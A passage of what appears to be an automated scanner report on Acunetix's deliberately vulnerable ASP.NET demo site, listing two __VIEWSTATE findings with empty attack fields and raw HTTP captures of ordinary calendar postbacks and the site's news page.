style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8191&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAelWGRtoIZGRk%2Bpbh8o1y8E6arxTvhzZcjAQz2eU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKP9Zm5CQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92FlhFV8nha4J6xrpoVOfQMJeJEg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:04 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAelWGRtoIZGRk+pbh8o1y8E6arxTvhzZcjAQz2eU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP9Zm5CQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92FlhFV8nha4J6xrpoVOfQMJeJEg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:White" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8195&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAIf%2BqSdoIZGRkHwBEMdMLyZdfPgna4hUWuz5IvgM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLXn%2Fz5CAK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2F%2Fjk7vEF7HAvnc6cgh2rgB7%2FAxPA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:26 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAIf+qSdoIZGRkHwBEMdMLyZdfPgna4hUWuz5IvgM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLXn/z5CAK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w//jk7vEF7HAvnc6cgh2rgB7/AxPA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:White" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 